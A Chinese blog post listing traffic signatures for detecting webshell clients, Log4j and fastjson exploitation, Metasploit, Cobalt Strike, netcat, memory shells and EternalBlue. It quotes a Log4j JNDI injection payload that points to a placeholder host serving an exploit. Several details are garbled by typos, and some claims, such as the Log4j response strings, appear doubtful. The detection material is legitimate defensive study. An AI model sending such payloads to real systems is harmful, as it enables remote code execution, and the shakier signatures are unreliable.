首页 > 其他分享 >常见流量特征

常见流量特征

时间:2023-09-12 15:11:06浏览次数:41  
标签:请求 特征 常见 端口 流量 MSF 数据包

蚁剑流量特征

base64 AES加密
传递函数: php 类常见@ini set("display errors","g"),@set time limit(@) , asp 类常见 execute
同时蚁剑也有eval这种明显的特征
混淆加密后常_ox......= 这种形式,以_x 开头的参数名,后面为加密数据的数据包也可识别为蚁剑的流量特征

菜刀流量特征

早期版本明文传输,后面是 base64 加密
特征主要在 body 中,base64-encode 默认参数为 zo
对其进行 base64 解密之后会发现脚本用于传递 payload 的函数,比如 php 的 eval 和 assert,asp 中 的 execute后面的版本 body 中部分字符被 unicode 编码替换混淆,常见 %u00
ua头为百度爬虫

冰蝎流量特征

AES 加密
在建立链接之前会有一个 AES 密交互过程,body 体中都是 AES 加密后密文
冰蝎数据包总是伴随着大量的content-type: application什么什么,无论GET还是POST,请求的http中,content-type为application/octet-stream
冰蝎2.0,contentength 请求长度,content-Length: 16 (在各种语言的webshell中都会存在16位数的连接密码)
冰蝎2.0,建立连接后 所有请求 Cookie的格式都为: cookie: PHSESSID=; path=/;
冰蝎3.0,内置的默认内置16个ua (user-agent)头
冰蝎3.0,在使用命令执行功能时,请求包中contentength 为5740或5720 (可能会根据Java版本而改变)
冰蝎3.0,每一个请求头中存在 pragma: no-cache,Cache-Control: no-cache.
冰蝎4.0,Content-Type: application/x-www-form-urlencoded0

哥斯拉流量特征

base64 加密
在所有请求中Cookie中后面都存在 ; 特征
选择默认脚本编码生成的情况下,isp连接特征与php请求一样都含有 pass,xc 而且发起连接时服务器返回的 Content-Length 是0(返为空)
Java反射 ( classLoader,getclass().getclassLoader() ) ,base64加解码等特征

log4j流量特征

HTTP请求中包含特定的JNDI注入Payload,如 ${jndi:ldap://x.x.x.x:1389/Exploit}
HTTP请求中包含特定的User-Agent头,如“ Log4j2”或“ Log4jAPI/2.0.8”等
HTTP响应中包含特定的响应码,如“2.0K”等
HTTP响应中包含特定的响应内容,如“JNDI lookup successful”等

fastjson的攻击链流量特征

  • JSON数据中含有Fastjson的特定反序列化注解,如@JSONField、@JSONType等。
  • JSON数据中存在恶意代码片段,可能会利用Java反射、利用Java漏洞等进行远程代码执行。
  • 反序列化过程中,Fastjson解析器对特定类型的处理异常或异常流量。
  • 反序列化后,应用程序行为异常,可能出现未预期的输出、远程命令执行等异常行为。

MSF流量特征

  • Jser-Agent 字段: MSF 通常会自定义 User-Agent 字段
  • Payload: MSF 使用的 Payload 通常是经过编码的二进制数据,例如 base64 编码后的 Shellcode
  • 特定协议端口: MSF 可以利用多种协议进行攻击,例如常用的 TCP 和 HTTP 协议,因此可以根据特定协议的端口号来识别MSF 的流量,MSF 生成的后门程序通常会监听不常用的端口,例如 4444 等
  • 请求 URL: MSF 通常会使用一些特殊的 URL 来发漏洞,例如使用 /cgi-bin/php4 或 /index,php?route=checkout/cart/add 等URL
  • 多次连接同一目标: MSF 生成的后门程席通常会通过多次连接同一目标来建立稳定的C&C通信
  • 恶意指令的参数: MSF 生成的后门程序通常会使用一些恶意指令来执行攻击者的操作,例如 shell 命令、文件下载等

CobaltStrike流量特征

  • 请求头中通常会包含User-Agent字段,其值通常为 cobalt Strike User Agent 或 Mozila/5,0(WindowsNT10.0;WOW64;Trident/7.0;rv:11.0)likeGeckoElectron/8.2.0 Safari/537.36
  • 响应头中通常会包含Content-Type为 application/octet-stream,表示返回的是二进制数据
  • 在HTTP请求中会使用Cookie进行会话管理,常见的Cookie名称包括 session、sessionid、JSESSIONID等
  • 通常会使用AES、RC4 等加密算法对数据进行加密,并使用 Base64 等编码方式进行数据转换
  • 常见的Cobalt Strike命令通常包括 beacon、tasklist、shel1等,可以通过检测网络流量中的这些关键词进行识别
  • 使用HTTP或HTTPS进行通信,默认请求方法是get,心跳包默认是60s,服务端默认端口是 50050

nc的流量特征

  • 默认使用明文传输
  • 数据包流量中包含可疑字符或特定的指令,例如如shell命令
  • nc可以使用TCP或UDP协议进行通信,因此其数据包流量通常包含TCP或UDP头部

内存马流量特征

非标准端口: 内存马通常使用非标准的通信端口进行与控制服务器的通信。例如使用高端口号或其他非常见端口
加密或编码流量:为了绕过网络检测和阻止,内存马通常会对通信流量进行加密或编码
高频率的通信:内存马可能会与控制服务器建立持续的通信,发送数据或接收指令。这可能导致与常规网络通信模式不同的高频率数据传输
异常流量模式:内存马的流量模式可能与正常的网络通信模式不同,例如数据包大小、时间间隔、通信方向等方面的异常
非常见的协议或通信方式:内存马可能使用非常见的协议或通信方式与控制服务器进行通信

java内存马流量特征

动态反射: 内存马使用Java的反射机制动态加载和执行代码,从而绕过静态分析和检测。
网络通信:内存马通常与远程命令和控制服务器建立通信,以接收进一步的指令或传输数据。这可能包括使用 HTTP、TCP、UDP 或其他协议进行通信。
反调试和反虚拟机检测:内存马可能会检测是否在调试环境下运行,并采取相应的反调试措施。此外,它可能还会尝过检测虚拟机环境,以防止被静态或动态分析。

永恒之蓝流量特征

使用smb协议
使用特定端口:攻击流量通常出现在TCP端口445、TCP端口139和UDP端口137/138上
大量连接请求:攻击者利用永恒之蓝进行攻击时,会发送大量的连接请求和数据包,因此在流量中可能出现大量的TCP连接请求和数据包传输
数据包偏大:永恒之蓝攻击利用的是SMBV1协议的漏洞,攻击数据包通常比较大,可能会超过正常的网络数据包大小,因此在流量中可能出现异常的数据包大小
流量数据包中会有恶意载荷:攻击者在利用永恒之蓝进行攻击时,通常会携带恶意载荷,如木马程序、后门程序等,因此在流量中口能会发现恶意载荷的传输

标签:请求,特征,常见,端口,流量,MSF,数据包
From: https://www.cnblogs.com/guwanghui/p/17696248.html

相关文章

  • K8S集群常见问题总结 集群服务访问失败 集群服务访问失败 集群服务暴露失败 外网无法
    问题1:K8S集群服务访问失败?原因分析:证书不能被识别,其原因为:自定义证书,过期等。解决方法:更新证书即可。问题2:K8S集群服务访问失败?curl:(7)Failedconnectto10.103.22.158:3000;Connectionrefused原因分析:端口映射错误,服务正常工作,但不能提供服务。解决方法:删除svc,重新映射端口......
  • Android开发中常见的设计模式
    Android开发中常见的设计模式对于开发人员来说,设计模式有时候就是一道坎,但是设计模式又非常有用,过了这道坎,它可以让你水平提高一个档次。而在android开发中,必要的了解一些设计模式又是非常有必要的。对于想系统的学习设计模式的同学,这里推荐2本书。一本是HeadFirst系列的HeadH......
  • xilinx赛灵思下载器jtag-hs3兼容alinx仿真fpga烧录digilent高速常见问题解答
    1.概述  XJTAG-HS3是XILINX的USB转JTAG的高速仿真器,可以下载、烧录和仿真Xilinx FPGA和CPLD芯片,以及配置PROM、FLASH. XJTAG-HS3比PlatformCableUSBII下载器快10倍速度。 可以在30Mbit/秒下驱动JTAG/SPI总线,并且能实现对XilinxZYNQ平台处理器核的重置。可以支持ZYN......
  • C与CPP常见编译工具链与构建系统简介
    笔者最近在研究CEF的CMake工程,心血来潮想要对各种编译工具链以及构建系统做一个简单的总结,于是就有了本文。本文不会讲解任何关于C/C++语言方面的内容,主要C/C++的编译出发,介绍各种编译工具链与构建系统的关系。此外,由于笔者水平有限,无法从非常专业的角度剖析C/C++的语言特性与编译......
  • 浅析三维模型3DTile格式轻量化处理常见问题与处理措施
    浅析三维模型3DTile格式轻量化处理常见问题与处理措施 三维模型3DTile格式的轻量化处理是大规模三维地理空间数据可视化的关键环节,但在实际操作过程中,往往会遇到一些问题。下面我们来看一下这些常见的问题以及对应的处理措施。变形过大:压缩过程中最常见的问题就是模型变形过......
  • kunyu 工具的常见案例和示例命令
    kunyu工具的常见案例和示例命令:基本主机搜索:执行基本的主机搜索,以获取有关特定域或IP地址的信息。 SearchHostexample.com基本Web搜索:执行基本的Web搜索,以查找与特定查询条件相关的网站。 SearchWeb"vulnerabilitiesinWordPress"SSL证书搜索:搜索与指......
  • 采集设备接线需注意问题 数据采集仪器接线常见问题及解答
    采集设备接线需注意问题数据采集仪器接线常见问题及解答在采集设备接线时,需要注意以下几个问题:线材选择:选择质量好、耐磨、耐高温、导电性能稳定的线材。接线端子:接线端子应该选用质量可靠的产品,接线时应注意端子与线材之间的插头是否紧固且无松动。接线顺序:采集设备的接线应按......
  • 操作系统原理(1)---操作系统的定义、功能、特征
    一、操作系统的定义操作系统(Operat ing System , OS )是计算机系统中最基本的系统软件。它控制和管理整个计算机系统的硬件和软件,合理地组织调度计算机的工作和资源的分配,以提供用户和其他软件方便的接口和环境。二、操作系统的功能与目标1.管理系统的软硬件资源:处理机......
  • Linux常见指令
    下列指令语法如果用[]括起来就是可有可无的。1、pwd指令语法:pwd功能:显示用户当前所在的目录常用选项:无举例:2、ls指令语法:ls[选项][目录或文件]功能:对于目录,该命令列出该目录下的所有子目录与文件。对于文件,将列出文件名以及其他信息。常用选项:-a列出目录下的所有文件,包括以.开头......
  • 【230910-2】双曲线:y^2/160^2-x^2/120^2=1图线及特征
    【图像】【代码】<!DOCTYPEhtml><htmllang="utf-8"><metahttp-equiv="Content-Type"content="text/html;charset=utf-8"/><head><title>双曲线:y^2/160^2-x^2/120^2=1</title><styletype=&qu......